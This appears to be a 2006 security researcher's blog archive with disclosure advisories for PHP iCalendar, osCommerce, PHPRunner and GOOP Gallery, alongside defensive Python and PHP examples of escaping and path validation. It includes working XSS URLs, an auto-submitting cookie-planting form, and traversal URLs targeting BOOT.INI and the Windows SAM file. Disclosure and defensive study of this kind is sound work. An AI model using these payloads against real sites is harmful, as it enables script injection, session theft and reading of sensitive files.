#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url:http://phpicalendar.net/
Advisory:http://lostmon.blogspot.com/2006/12/php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included:YES
OSVDB ID:32493,32494,32495,32496,32497,32498,32499,32500
Securitytracker:1017449
Secunia:SA23499
BID:21792
#####################################################
PHP iCalendar contains a flaw that allows remote cross-site scripting.
It exists because several scripts (day.php, month.php, year.php,
week.php, search.php, print.php, rss/index.php and preferences.php) do
not validate or encode the cal, getdate, cpath and query parameters
before echoing them back into the page inside an HTML attribute, so a
value beginning with "> closes the attribute and injects markup. In
preferences.php the cpath, unset and set values submitted to
action=setcookie are stored in the preferences cookie and reflected
as well. A remote attacker can therefore craft a URL that, when opened
by a victim, executes arbitrary script in the victim's browser within
the trust relationship between the browser and the server, leading to
a loss of integrity.
######################
versions
######################
All of the following versions were tested; other versions are
probably vulnerable as well.
PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1
######################
Solution:
######################
No solution was available at this time.
##################
Time Line
##################
Discovered:20-12-2006
Vendor notify:25-12-2006
Vendor response:
Disclosure:27-12-2006
###################
EXAMPLES & PoC
###################
getdate in day.php, month.php, year.php and week.php:
http://localhost/phpicalendar/day.php?cal=all_calendars_combined971&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/month.php?cal=all_calendars_combined971&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/year.php?cal=all_calendars_combined971&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/week.php?cal=all_calendars_combined971&getdate=20061225"><script>alert()</script>
cpath in the same scripts (payload URL-encoded; it writes document.domain to prove the origin):
http://localhost/phpicalendar/day.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/month.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/year.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/week.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
----
query, cpath and getdate in search.php:
http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15
http://localhost/phpicalendar/search.php?cpath="><script>alert()</script>&cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12
http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102"><script>alert()</script>&query=ss&submit.x=11&submit.y=12
----
getdate in rss/index.php and print.php:
http://localhost/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/print.php?cal=Home,US+Holidays,Work&getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day
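The pattern behind every URL above is the same: the parameter is echoed into an HTML attribute value without encoding, so a value that begins with "> closes the attribute and the tag, and whatever follows is parsed as markup. The Python below is an added example, not code from PHP iCalendar or from this advisory. It models a script that rebuilds its navigation links from cal and getdate, first in the vulnerable form, then with attribute escaping only, then with type validation in front of the escaping, and includes a small checker that reports whether the page's payload comes back raw or entity-encoded. The same check applies to the osCommerce admin pages in the advisories further down. The renderer, the allowed character set for calendar names and the sample values are assumptions made for the example.

```python
import re
from html import escape

# The attribute break-out payload used by the PoC URLs on this page.
PAYLOAD = '"><script>alert()</script>'


def render_nav_vulnerable(cal: str, getdate: str) -> str:
    """Model of the vulnerable pattern (not PHP iCalendar's own code):
    request parameters are pasted straight into HTML attribute values,
    so a value starting with '">' closes the attribute and the tag."""
    return (f'<a href="day.php?cal={cal}&getdate={getdate}">Day</a>\n'
            f'<input type="hidden" name="getdate" value="{getdate}">')


def render_nav_escaped(cal: str, getdate: str) -> str:
    """Escaping only: every reflected value is entity-encoded for the
    attribute context.  This alone stops the break-out."""
    cal_q = escape(cal, quote=True)
    date_q = escape(getdate, quote=True)
    return (f'<a href="day.php?cal={cal_q}&amp;getdate={date_q}">Day</a>\n'
            f'<input type="hidden" name="getdate" value="{date_q}">')


# Used with fullmatch(), so a trailing newline cannot slip past a '$'.
DATE_RE = re.compile(r"[0-9]{8}")                 # getdate is YYYYMMDD
CAL_RE = re.compile(r"[A-Za-z0-9_+ ,-]{1,64}")    # assumed charset for cal names


def render_nav_hardened(cal: str, getdate: str) -> str:
    """Validation plus escaping: reject anything that is not a plausible
    date or calendar name before it reaches the template, then escape
    anyway (defence in depth).  The allowed charset for cal is an
    assumption for this example."""
    if not DATE_RE.fullmatch(getdate):
        raise ValueError("getdate must be exactly 8 digits")
    if not CAL_RE.fullmatch(cal):
        raise ValueError("unexpected characters in cal")
    return render_nav_escaped(cal, getdate)


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Classify how a payload came back in a response body:
    'raw'     -> present unencoded, the attribute break-out works
    'encoded' -> present only with < > " turned into entities
    'absent'  -> not reflected at all"""
    if payload in body:
        return "raw"
    if escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def probe(renderer, cal: str = "Home", getdate: str = "20061225") -> dict:
    """Append PAYLOAD to each parameter in turn, exactly as the PoC URLs
    do, and report how the renderer reflects it.  A renderer that
    refuses the input is reported as 'rejected'."""
    results = {}
    for name in ("cal", "getdate"):
        args = {"cal": cal, "getdate": getdate}
        args[name] = args[name] + PAYLOAD
        try:
            results[name] = classify_reflection(renderer(**args))
        except ValueError:
            results[name] = "rejected"
    return results


if __name__ == "__main__":
    for r in (render_nav_vulnerable, render_nav_escaped, render_nav_hardened):
        print(f"{r.__name__:22s} {probe(r)}")
```

Run against a live target, classify_reflection() is applied to the HTTP response body of each PoC URL; 'raw' confirms the break-out, 'encoded' means output encoding is in place, and a validating front end such as render_nav_hardened never lets the payload reach the template at all.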
################################
Proof of concept for preferences
################################
Multiple param XSS in preferences.php
The values submitted to preferences.php?action=setcookie (cpath, unset
and set in the form below) are stored in the preferences cookie and
reflected back by the application, so the payload persists in that
browser's cookie. Use the PoC form below and adjust the parameters as
needed; it plants the malicious cookie on submit.
http://localhost/phpicalendar/preferences.php?cal=Home,US+Holidays,Work&getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E
<html>
<head>
<title>PHP icalendar XSS in preferences.php PoC</title>
</head>
<body>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> &lt;= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host, by default http://localhost/</p>
<br /><br /><form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input type='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input type='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input type='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input type='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input type='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input type='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input type='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input type='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input type='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<p>Source of the same form with an auto-submit script, for copying into a page of your own:</p>
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input type='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input type='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input type='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input type='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input type='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input type='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input type='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input type='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input type='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
<script>
document.forms[0].submit()
</script>
</textarea>
</body>
</html>
######################## End #####################
Thanks to Estrella for being my light.
--
Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what keeps the mind moving....
Indexing of vulnerabilities
Thursday, December 21, 2006
########################################
Indexing of some vulnerabilities
########################################
In recent years, after looking closely at how new vulnerabilities are
discovered and published, from the point of view of the person who
discovers and publishes them (what the process actually is from the
moment a vulnerability is discovered until it is published by the many
security lists, how it is added to those lists' databases, how it is
documented and finally how it is published), several considerations
come to mind...
For a long time there have been attempts at standardisation, so that
flaw records can be classified in a way that makes it easy to recognise
them (the cause), to know the kind of attack that can be carried out
(the impact), and to know the possible mitigation or fix.
I would like to make an aside, above all about the way a certain class
of vulnerabilities is usually handled: those that are exploitable
through the URL, that is, by modifying the values of one of the
variables or parameters in the URL.
The vulnerabilities I want to comment on are the following:
cross-site scripting, SQL injection, directory traversal / arbitrary
file access, and a few others I will leave aside.
All of these holes are usually exploited through the URL, and almost
all of them make use of the different variables passed from one page
to another in a site's POST or GET requests.
Take for example a URL with several parameters, one of which is
vulnerable...
http://[victim]/folder/file.php?var1=value1&var2=[XSS-CODE]&var3=value3
This vulnerability would most likely be named...
[affected product] + [variable name] + [hole]
So we would say our product is vulnerable to a cross-site scripting
bug in the variable var2.
When this vulnerability reaches the security lists, they echo it and
add the affected file if the discoverer did not specify it, so the
description of our vulnerability would say that product XXX is
vulnerable to cross-site scripting in the variable var2 when it is
sent to the file 'file.php'.
What if that variable were not defined in that page? What if it came
from another page we POSTed from, or lived in another file that is
included by the page that is supposedly vulnerable?
We would surely go crazy trying to locate the flaw, and we would have
to look at many more files than we really need to in order to pin that
vulnerability on a particular use of the affected variable.
The developer would surely have a harder time finding the exact error,
because we are giving them incorrect information about where the
vulnerability lies by naming a file where the variable supposedly
fails.
Take as an example a PHP-NUKE style portal where, in the example, the
first variable calls a module and the second one comes from the module
that was called.
http://[PHP-NUKE]/modules.php?name=News&new_topic=1
If there were a vulnerability in the second variable, the lists would
likewise describe it as "the variable new_topic is vulnerable when sent
to the file modules.php", but this vulnerability would almost certainly
come from the file News.php located in PHP-NUKE's modules directory.
The developer would probably fix that variable in the page mentioned,
but the same variable would probably still be vulnerable from another
point in the portal, because it was not corrected directly where that
variable or parameter is initialised; in effect the vulnerability could
split into two.
If the security lists state that the variable new_topic is vulnerable
to cross-site scripting when sent to modules.php, and that variable is
actually defined in the file news.php...
Wouldn't it be more correct to say that the variable new_topic is
vulnerable at both points rather than only at the first?
This kind of "error" in documenting vulnerabilities may lead one to
believe that many vulnerabilities of the type described are listed
incorrectly, or may mislead, because most of the time the definition
itself is wrong.
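To find where a parameter is actually consumed, rather than which script name happens to appear in the URL, search the whole tree for both its register_globals form ($new_topic) and its superglobal form ($_GET['new_topic'], $_POST[...], $_REQUEST[...]). The Python below is an added example, not PHP-Nuke's code or anything from this post: it runs that search over a small constructed source tree modelled on the modules.php?name=News&new_topic=1 example above, and shows that modules.php, the file a list entry would name, never reads new_topic at all; the module files do. The file names and contents in SAMPLE_TREE are invented for the example.

```python
import re

# Constructed sample tree modelled on the essay's PHP-Nuke example.
# It is not PHP-Nuke's real source; file names and contents are assumed.
SAMPLE_TREE = {
    "modules.php": (
        "<?php\n"
        "$name = $_GET['name'];\n"
        "include(\"modules/$name/index.php\");\n"
    ),
    "modules/News/index.php": (
        "<?php\n"
        "// register_globals era: the query-string value lands here directly\n"
        "echo \"<a href=\\\"modules.php?name=News&new_topic=$new_topic\\\">\";\n"
    ),
    "modules/News/topics.php": (
        "<?php\n"
        "echo \"<option value=\\\"$new_topic\\\">\";\n"
    ),
    "admin/index.php": (
        "<?php\n"
        "$t = $_REQUEST['new_topic'];\n"
    ),
}


def consumer_pattern(param: str) -> re.Pattern:
    """Match a request parameter wherever PHP code can read it: as a
    register_globals variable ($param) or through $_GET / $_POST /
    $_REQUEST['param']."""
    p = re.escape(param)
    return re.compile(
        r"\$" + p + r"\b"
        r"|\$_(?:GET|POST|REQUEST)\[\s*['\"]" + p + r"['\"]\s*\]"
    )


def find_parameter_consumers(tree: dict, param: str) -> dict:
    """Return {path: [line numbers]} for every file in `tree` that reads
    `param`.  `tree` maps a relative path to the file's source text; on a
    real checkout you would build it by walking the directory."""
    pat = consumer_pattern(param)
    hits = {}
    for path, src in tree.items():
        lines = [n for n, line in enumerate(src.splitlines(), 1) if pat.search(line)]
        if lines:
            hits[path] = lines
    return hits


def entry_point_reads(tree: dict, entry: str, param: str) -> bool:
    """Does the script named in the URL read the parameter itself?  When
    this is False, the fix belongs in the consumer files, not in `entry`,
    and an advisory that names only `entry` points the developer at the
    wrong place."""
    return entry in find_parameter_consumers(tree, param)


if __name__ == "__main__":
    print("new_topic consumers:", find_parameter_consumers(SAMPLE_TREE, "new_topic"))
    print("modules.php reads new_topic:",
          entry_point_reads(SAMPLE_TREE, "modules.php", "new_topic"))
```

On the sample tree new_topic is read in two module files and one admin script, and modules.php is not among them; each of those locations needs its own fix, which is the essay's point about a single vulnerability splitting into several.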
--
Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what keeps the mind moving....
Oscommerce traversal arbitrary file access
Thursday, December 07, 2006
############################################
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisory:http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
Securitytracker:1017353
BID:21477
###########################################
osCommerce contains a flaw that allows directory traversal and
arbitrary file access. It exists because the application does not
validate the filter parameter before using it to build the path that
admin/templates_boxes_layout.php require()s. A remote authenticated
administrator can craft a URL containing '../' sequences to pull files
from the target system into the application; they are read (and, if
they are PHP, executed) with the privileges of the web server process.
####################
versions
####################
Oscommerce 3.0a3
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:11-11-2006
vendor notify:------
vendor response:
disclosure:07-12-2006
#################
Examples
#################
######################
traversal file access
######################
When we request
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=[SOME WORD]&lID=27
the application discloses its full installation path in this error:
Warning: require(includes/templates/[SOME WORD].php) [function.require]: failed to open stream: No such file or directory in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
Fatal error: require() [function.require]: Failed opening required 'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear') in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
So the application appends a .php extension to the filter value and
require()s the result from a folder inside the web root, without
checking for traversal sequences. Any PHP file already on the server
can therefore be pulled into the application and executed (local file
inclusion):
http://[victim]/admin/templates_boxes_layout.php?set=boxes&filter=../../our_evil_php_file&lID=27
To read a file outside the web root that does not end in .php, a
trailing NUL byte (%00) cuts off the appended extension; this works on
the PHP 5 builds of the time, while PHP 5.3.4 and later reject paths
containing a NUL byte. For example, boot.ini or the SAM backup on a
Windows host:
&filter=../../../../file.extension%00
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=../../../../BOOT.INI%00&lID=27
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=content&filter=../../../../windows/repair/sam%00&lID=27
Note that the script lives under /admin, so an authenticated
administrator session is required, and the number of '../' steps
depends on where the installation sits relative to the file.
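The Python below is an added example, not osCommerce's code. It models the path arithmetic behind require('includes/templates/' . $filter . '.php') on an assumed Linux layout (the advisory's host was C:\AppServ\www\oscommerce, but the traversal works the same way), including the NUL-byte truncation that PHP builds before 5.3.4 performed, and sets a hardened resolver beside it that allowlists the template name and re-checks that the resolved path stays inside the template directory. TEMPLATE_DIR and the allowed name pattern are assumptions for the example.

```python
import posixpath
import re

# Assumed install layout for this example (the advisory's host ran on
# C:\AppServ\www\oscommerce; the path arithmetic is the same).
TEMPLATE_DIR = "/var/www/oscommerce/admin/includes/templates"


def build_include_path(filter_value: str, php_truncates_at_nul: bool = True) -> str:
    """Model of the vulnerable construction (not osCommerce's own code):
    require('includes/templates/' . $filter . '.php').
    Before PHP 5.3.4 the path reached the C library as a NUL-terminated
    string, so everything after %00 (including the appended '.php') was
    dropped.  PHP 5.3.4 and later refuse paths containing a NUL byte."""
    raw = posixpath.join(TEMPLATE_DIR, filter_value + ".php")
    if "\x00" in raw:
        if not php_truncates_at_nul:
            raise ValueError("PHP >= 5.3.4: NUL byte in path is rejected")
        raw = raw.split("\x00", 1)[0]
    return posixpath.normpath(raw)


def escapes_template_dir(path: str, template_dir: str = TEMPLATE_DIR) -> bool:
    """True when the normalised path lies outside template_dir."""
    return posixpath.commonpath([template_dir, path]) != template_dir


# Hardened resolver: allowlist the name, then re-check containment.
# Used with fullmatch(), so no '$'-before-newline trick applies.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_template(filter_value: str, template_dir: str = TEMPLATE_DIR) -> str:
    """Return the template path for a validated name, or raise ValueError.
    The allowlist already excludes '/', '.', and NUL, so the containment
    check is defence in depth rather than the only barrier."""
    if not NAME_RE.fullmatch(filter_value):
        raise ValueError("template name contains disallowed characters")
    candidate = posixpath.normpath(posixpath.join(template_dir, filter_value + ".php"))
    if escapes_template_dir(candidate, template_dir):
        raise ValueError("resolved path leaves the template directory")
    return candidate


if __name__ == "__main__":
    for f in ("boxes",
              "../../../uploads/evil",
              "../../../../../../../../etc/passwd\x00"):
        p = build_include_path(f)
        print(f"{f!r:45s} -> {p}  outside={escapes_template_dir(p)}")
```

The second sample walks three directories up to include an attacker-controlled .php file elsewhere under the web root; the third shows why the NUL byte mattered, since without truncation the request would be for /etc/passwd.php, which does not exist.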
#####################
Cross site scripting
#####################
http://localhost/oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost/definitiva/admin/customers.php?selected_box=customers%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/languages_definitions.php?lID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
######################## End #####################
Thanks to Estrella for being my light.
--
Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what keeps the mind moving....
Oscommerce Multiple XSS in admin section
Monday, November 20, 2006
##########################################
Oscommerce Multiple XSS in admin section.
Vendor url:http://www.oscommerce.com
Advisory:http://lostmon.blogspot.com/2006/11/oscommerce-multiple-xss-in-admin.html
Vendor notify:YES Exploit available: YES
OSVDB ID:33212,33213,33214,33216,33217,33218
Securitytracker:1017269
Secunia:SA22275
##########################################
osCommerce contains a flaw that allows remote cross-site scripting. It
exists because several scripts under /admin do not validate or encode
the parameters listed below before echoing them back into the page. A
remote attacker can craft a URL that, when opened by a logged-in
administrator, executes arbitrary script in the administrator's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
####################
versions
####################
Oscommerce -2.2ms2-060817
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:29-10-2006
vendor notify:20-11-2006
vendor response
disclosure:21-11-2006
#################
Examples
#################
If the admin area is protected by authentication (the default), the
victim must be logged in to the admin section for any of these to
fire; the attacker's job is to get an administrator to open the link.
The osCAdminID value in one of the URLs is the session identifier of
the author's test install (osCommerce propagates it in URLs in some
configurations); use the current session's value or drop the
parameter. 'catalog' and 'definitiva' are the author's local install
directories.
-------------------------------
gID param in configuration.php
-------------------------------
http://[Victim]/catalog/admin/configuration.php?gID=1">[XSS-CODE]&cID=3
--------------------------
set param in modules.php
--------------------------
http://localhost/catalog/admin/modules.php?selected_box=modules&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5
http://localhost/catalog/admin/modules.php?set=payment">[XSS-CODE]&module=pm2checkout
http://localhost/catalog/admin/modules.php?set=ordertotal&module=ot_loworderfee">[XSS-CODE]&action=edit
--------------------------------------------------
option_order_by, value_page, option_page and products_options_name in products_attributes.php
--------------------------------------------------
http://[Victim]/catalog/admin/products_attributes.php?action=update_option&option_id=1&option_order_by=">[XSS-CODE]&products_options_id&option_page=1
http://[Victim]/definitiva/admin/products_attributes.php?option_order_by=products_options_id&value_page=2">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?option_page=1&option_order_by=products_options_name">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?action=update_option&option_id=1&option_order_by=products_options_id&option_page=1">[XSS-CODE]
http://[Victim]/catalog/admin/products_attributes.php?action=update_option&option_id=1&option_order_by=products_options_id&option_page=1">[XSS-CODE]
-------------------------------
lID param in languages.php
-------------------------------
http://localhost/definitiva/admin/languages.php?page=1&lID=3">[XSS-CODE]&action=new
-------------------------------
selected_box, cID in customers.php
-------------------------------
http://localhost/definitiva/admin/customers.php?page=1&cID=1[XSS-CODE]&action=edit
http://[Victim]/catalog/admin/customers.php?selected_box=customers">[XSS-CODE]
-------------------------------
spage, zID, sID in geo_zones.php
-------------------------------
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&action=list&spage=1">[XSS-CODE]&sID=1&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new
######################## End #####################
Thanks to Estrella for being my light.
--
Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what keeps the mind moving....
PHPRunner database credentials disclosure
Monday, November 13, 2006
##########################################
PHPRunner database credentials disclosure
Vendor url:http://www.xlinesoft.com/phprunner/
Advisory:http://lostmon.blogspot.com/2006/11/phprunner-database-credentials.html
Vendor notify:yes exploit available:yes
OSVDB ID:30363
Securitytracker:1017218
Secunia:SA22863
BID:21054
##########################################
Description (vendor text):
PHPRunner builds a visually appealing web interface for any local or
remote MySQL, MS Access, SQL Server or Oracle database. Web site
visitors can easily search, add, edit, delete and export data in the
database. Advanced security options allow password-protected,
members-only web sites to be built easily. PHPRunner is simple to
learn, so a first project can be built in about fifteen minutes.
Vulnerability:
PHPRunner contains a flaw that allows local users to read every set of
database credentials the tool has been configured with. It exists
because the application stores the database server, database names,
usernames and passwords in plain text in a file under the Windows
directory. Any local user can open \windows\PHPRunner.ini directly and
obtain all of that information; since the Windows directory is readable
by ordinary users on a default installation, no elevated privileges are
needed.
Versions:
This was tested on version 3.1.
Solution:
No solution was available at this time.
Timeline:
Discovered:21-10-2006
vendor notify:13-11-2006
vendor response:13-11-2006
disclosure:13-11-2006
Example:
Open c:\windows\PHPRunner.ini
######################## End #####################
Thanks to Estrella for being my light.
--
Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what keeps the mind moving....
GOOP Gallery 'image' param Cross-site scripting
Monday, October 16, 2006
################################################
GOOP Gallery 'image' param Cross-site scripting
Vendor url:http://www.webgeneius.com
Advisory: http://lostmon.blogspot.com/2006/10/goop-gallery-image-param-cross-site.html
Vendor notify: YES Exploit available: YES
securitytracker:1017081
Secunia: SA22258
BID:20554
################################################
GOOP Gallery contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application does
not validate the 'image' param upon submission to the index.php script.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.
################
Versions
################
GOOP Gallery 2.0 vulnerable
GOOP Gallery 2.0.3 not Vulnerable
################
Solution
################
Upgrade to GOOP Gallery 2.0.3 as soon as possible.
http://webgeneius.com/index.php?mod=blog&id=49
Download GG2.0.3:
http://webgeneius.com/downloads/gg2.0.3.zip
################
Timeline
################
Discovered:09-10-2006
Vendor notify:14-10-2006
Vendor response:15-10-2006
Vendor Fix: 16-10-2006
Disclosure: 16-10-2006
##############
Example
##############
http://Victim/goopgallery/index.php?next=%BB&gallery=demo+gallery+1&image=Bunny.JPG">[XSS-CODE]
http://Victim/goopgallery/index.php?gallery=demo+gallery+1&image=Bunny.JPG">[XSS-CODE]
######################## €nd #####################
Thanks to Estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
osCommerce multiple Scripts 'page' param XSS
Tuesday, October 03, 2006
###############################################
osCommerce multiple Scripts 'page' param XSS
Vendor url: http://www.oscommerce.com
Vendor Bugtracker:http://www.oscommerce.com/community/bugs,4303
Advisory: http://lostmon.blogspot.com/2006/10/oscommerce-multiple-scripts-page-param.html
Vendor notify:yes
OSVDB ID:29795,29796,29797,29798,29799,29800,
29801,29802,29803,29804,29805,29806,
29807,29808
Securitytracker:1016979
BID:20343
Secunia:SA22275
FrSIRT: FrSIRT/ADV-2006-3917
###############################################
osCommerce contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application does
not validate the 'page' param upon submission to multiple scripts
in the /admin folder. This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
The same situation occurs in 'admin/geo_zones.php', but with the
param 'zpage'.
####################
VERSIONS
####################
osCommerce 2.2 Milestone 2 Update 060817
####################
SOLUTION
####################
no solution was available at this time.
#######################
VULNERABLE CODE
#######################
Around line 30 in banner_manager.php we have:
tep_redirect(tep_href_link(FILENAME_BANNER_MANAGER,
'page=' . $HTTP_GET_VARS['page'] . '&bID=' .
$HTTP_GET_VARS['bID']));
The page param is used directly, without sanitizing.
Around line 115 we have a similar situation:
the page param is taken from the GET request without sanitizing.
All of the vulnerable scripts have the same situation,
but with different code.
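As an added example (not osCommerce's own code), the banner_manager.php pattern quoted above beside a hardened version; build_link() is an assumed stand-in for osCommerce's tep_href_link(), joining the script name and query string the same way, so the snippet runs on its own.

```php
<?php
// Added example, not osCommerce code: the banner_manager.php pattern from the
// advisory beside a hardened version. build_link() is a stand-in (assumption)
// for osCommerce's tep_href_link(); it joins the script name and query string
// the same way, which is all the vulnerable call relies on.

define('FILENAME_BANNER_MANAGER', 'banner_manager.php');

// Constructed request: the 'page' value carries the payload shape the
// advisory's examples use (page=1[XSS-code]).
$HTTP_GET_VARS = array(
    'page' => '1"><script>alert()</script>',
    'bID'  => '7',
);

function build_link($script, $query)
{
    return $script . '?' . $query;
}

// Vulnerable pattern from the advisory: 'page' and 'bID' are concatenated
// untouched, so whatever the client sent ends up in the redirect target and,
// in the other listed scripts, in links printed into the admin page.
function vulnerable_link(array $get)
{
    return build_link(FILENAME_BANNER_MANAGER,
        'page=' . $get['page'] . '&bID=' . $get['bID']);
}

// Hardened version: both values are integers by contract, so cast them.
// (int)'1"><script>...' is 1 in PHP, so no markup survives the cast.
function hardened_link(array $get)
{
    $page = max(1, (int) $get['page']);
    $bid  = (int) $get['bID'];
    return build_link(FILENAME_BANNER_MANAGER, 'page=' . $page . '&bID=' . $bid);
}

// Where a link is echoed into an HTML attribute, escape it as well: the cast
// covers only these two parameters, not any other value that reaches the page.
function link_attribute($url)
{
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

echo "vulnerable: " . vulnerable_link($HTTP_GET_VARS) . "\n";
echo "hardened:   " . hardened_link($HTTP_GET_VARS) . "\n";
echo '<a href="' . link_attribute(vulnerable_link($HTTP_GET_VARS)) . '">next</a>' . "\n";
```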
####################
Vulnerable scripts
####################
admin/banner_manager.php
admin/banner_statistics.php
admin/countries.php
admin/currencies.php
admin/languages.php
admin/manufacturers.php
admin/newsletters.php
admin/orders_status.php
admin/products_attributes.php
admin/products_expected.php
admin/reviews.php
admin/specials.php
admin/stats_products_purchased.php
admin/stats_products_viewed.php
admin/tax_classes.php
admin/tax_rates.php
admin/zones.php
####################
Timeline
####################
Discovered: 27-09-2006
Vendor notify:03-10-2006
Vendor response:------
Vendor fix:--------
Disclosure: 03-10-2006 (vendor Bugtracker)
Public disclosure:04-10-2006
####################
EXAMPLES
####################
http://localhost/catalog/admin/banner_manager.php?page=1[XSS-code]
http://localhost/catalog/admin/banner_statistics.php?page=1[XSS-code]
http://localhost/catalog/admin/countries.php?page=1[XSS-code]
http://localhost/catalog/admin/currencies.php?page=1[XSS-code]
http://localhost/catalog/admin/languages.php?page=1[XSS-code]
http://localhost/catalog/admin/manufacturers.php?page=1[XSS-code]
http://localhost/catalog/admin/newsletters.php?page=1[XSS-code]
